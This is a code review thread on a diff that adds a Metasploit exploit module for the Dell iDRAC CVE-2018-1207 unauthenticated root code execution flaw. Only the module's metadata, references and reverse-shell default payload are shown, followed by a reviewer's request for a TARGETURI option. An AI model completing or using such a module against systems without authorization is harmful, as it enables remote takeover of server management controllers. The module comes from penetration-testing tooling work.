modules/exploits/linux/http/dell_idrac_upload_exec.rb

```diff
@@ -0,0 +1,188 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Remote
+  Rank = NormalRanking
+
+  include Msf::Exploit::Remote::HttpClient
+  include Msf::Exploit::FileDropper
+
+  def initialize(info = {})
+    super(update_info(info,
+      'Name' => 'Dell iDRAC 7/8 Devices Code Injection Vulnerability (RCE)',
+      'Description' => %q(
+        CVE-2018-1207. Vulnerable version firmware: <  2.52.52.52. Unauthenticated remote code execution
+        against Dell iDRAC 7 and 8, which runs as root.
+      ),
+      'License' => MSF_LICENSE,
+      'Author' =>
+        [
+          'Wyatt Dahlenburg (@wdahlenb)',
+          'Starev Alexey ( https://t.me/starev_aa ), http://kraud.ru'
+        ],
+      'DisclosureDate' => '2018-09-06',
+      'Platform' => 'linux',
+      'DefaultOptions' => { 'Payload' => 'generic/shell_reverse_tcp' },
+      'SessionTypes' => [ 'shell' ],
+      'Targets' => [['Auto', {}]],
+      'References' =>
+        [
+          ['URL', 'https://github.com/KraudSecurity/Exploits/blob/master/CVE-2018-1207/CVE-2018-1207.py'],
+          ['URL', 'https://www.immunityinc.com/downloads/The-Unbearable-Lightness-of-BMC-wp.pdf'],
+          ['URL', 'https://nvd.nist.gov/vuln/detail/CVE-2018-1207'],
+          ['CVE', '2018-1207']
+        ],
+      'DefaultTarget' => 0))
+    register_options [
```

Comment:
Add a `TARGETURI` option to give users the option to set the base path for the target:

```
OptString.new('TARGETURI', [true, "The base path to Dell iDRAC", '/'])
```

After defining the option, you can access its value with `target_uri.path`.

Reply:
Implemented in 78b7848